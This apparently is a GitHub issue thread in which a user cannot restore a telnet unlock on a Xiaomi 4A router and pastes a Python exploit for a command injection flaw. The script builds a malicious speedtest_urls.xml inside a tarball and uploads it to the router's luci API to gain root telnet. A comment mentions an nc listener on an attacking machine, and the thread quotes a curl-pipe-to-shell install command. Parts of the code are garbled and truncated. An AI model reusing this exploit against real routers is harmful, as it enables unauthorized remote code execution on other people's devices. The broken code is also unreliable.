
code 1629

Closed this issue · 1 comments


I'm one of the first users of this method, but I only used the "telnet" method, without flashing OpenWrt firmware.
The "telnet" worked well until approximately May 1st, before I installed the Aria2 Ngrok on MIXBOX. Before the day, I only had ShadowSocks on MIXBOX, and it worked well.

Finding the "telnet" method in unaccessible, I reset the official firmware 2.28.62. But can't use "telnet" still. Then I started to look into the "" and its dependencies, then made some debug prints, as is shown in attachment.

I personally think the reason for the first-broken-down is low ROM in 4A-Gibit. It can't install too many plugins. And a completely erase in memory may help, but I don't know how......

I really appreciate it if someone can help me restore "telnet".

First run on win 10. Bug appeared and tried ubuntu 20.04LTS, both failed with {"code":1629,"msg":"解压失败,可能文件已经损坏"}

Besides, I found it unnecessary to flash OpenWrt firmware if you only want the very SSR.
I installed MIXBOX on my 4A-Gibit using "telnet" command line

sh -c "$(curl -kfsSl" && source /etc/profile &> /dev/null

MIXBOX is really easy to handle, and most importantly, it will never get your router bricked.


# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23. 
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress, 
# so you can control the contents of the files in the decompressed directory. 
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml, 
# and there is a command injection vulnerability.

# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security

# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3

import os
import shutil
import tarfile
import requests

router_ip_address = input("Router IP address: ")
# router_ip_address = ""

# get stok
stok = input("stok: ")
# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"

# From
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command="((sh /tmp/ exploit) &)"

# proxies = {"http":""}
proxies = {}

if os.path.exists("build"):
	print('no build')

## make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml","rt",encoding='utf-8') as f:
	template =
data = template.format(router_ip_address=router_ip_address, command=command)

with open("build/speedtest_urls.xml",'wt',encoding='utf-8') as f:

# Make tar
with"build/payload.tar.gz", "w:gz",encoding='utf-8') as tar:
	tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")

	# tar.add("busybox")
	# tar.add("extras/wget")
	# tar.add("extras/xiaoqiang")

## upload config file
print("start uploading config file...")
r1 ="http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)

# ## exec download speed test, exec command
# print("start exec command...")
# r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
# # print(r2.text)

# print("done! Now you can connect to the router using telnet (user: root, password: none)")
# print("In MacOS, execute in the terminal:")
# print("telnet {}".format(router_ip_address))

Sorry, I cant help you, seems like a pretty complex setup the one you are working with. I would suggest try to simplify your setup. You can try to ask in the OpenWrt forum